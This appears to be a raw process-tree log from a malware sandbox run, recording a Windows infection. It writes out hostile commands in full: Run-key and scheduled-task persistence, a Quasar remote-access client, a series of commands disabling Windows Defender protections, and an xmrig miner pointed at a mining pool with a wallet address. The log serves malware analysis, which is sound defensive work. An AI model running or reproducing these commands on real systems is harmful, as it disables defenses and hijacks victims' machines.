                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:4820
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:6836
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6492
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:7048
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:6528
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          CMD /C CALL echo y
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:6920
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:6056
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:7128
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:8108
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  CMD /C CALL echo y
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:6784
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:7580
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:8072
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        CMD /C CALL echo y
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2708
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:7952
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:3208
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:4264
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:1372
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:5328
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:60
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:8180
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:7380
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          CMD /C CALL echo y
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:6236
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:6976
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:4316
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:4272
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:4756
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5816
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:7528
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:5736
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          CMD /C CALL echo y
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:7904
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1664
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:5784
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:5720
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  CMD /C CALL echo y
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:5908
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:6904
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:8144
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        CMD /C CALL echo y
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:5260
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:5196
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:8032
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:4716
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:4540
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:7208
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5032
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:3604
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:8028
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          CMD /C CALL echo y
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:3924
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:916
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:4392
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:6708
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:4852
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              PID:3936
                                                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:5452
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 268
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:5588
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7F98.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7F98.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                              PID:2692
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                PID:1948
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                PID:4180
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                PID:208
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:5100
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:4768
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:4812
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:5780
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:5244
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\81DB.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\81DB.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                        PID:1148
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                          PID:2668
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:4524
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            "powershell" Get-MpPreference -verbose
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:2280
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:2680
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5688
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:5860
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:5296
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:5504
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:2196
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:6084
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:5728
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:5372
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:5648
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:6128
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\xmrig.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\xmrig.exe" --cinit-find-x -B --log-file=9RIOMZF43M2579EBDZT27GRSLJ5FTIGR0KZ599YRMKUFCI.txt --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=46N5zSuWXZxEL9R15g1BxDKTjKxqYJghY6BoGAF6TxkqJrpxeqyfWAqjawsQgUT3tx8PyTuZRdiL6CCAY5QAJqi9JGa6Rr9 --pass=XMR Miner --cpu-max-threads-hint=50 --cinit-stealth-targets="Wi4AbZOHTuCRnu5j9xZIAA==" --cinit-idle-wait=10 --cinit-idle-cpu=90 --cinit-stealth
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:6872
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\DBCPWVMQC0O4JKLC7S55K6VXL.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\DBCPWVMQC0O4JKLC7S55K6VXL.exe"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:1160
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "China" /tr '"C:\Users\Admin\AppData\Roaming\China.exe"' & exit
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:4308
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "China" /tr '"C:\Users\Admin\AppData\Roaming\China.exe"'
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                PID:5552
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF379.tmp.bat""
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:4864
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                  timeout 3
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                  PID:4768
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\China.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\China.exe"
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7264
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\TQKJ74O323AZCC3ALVFLEWJJC.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\TQKJ74O323AZCC3ALVFLEWJJC.exe"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1412
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\Documents\TQKJ74O323AZCC3ALVFLEWJJC.exe" /rl HIGHEST /f
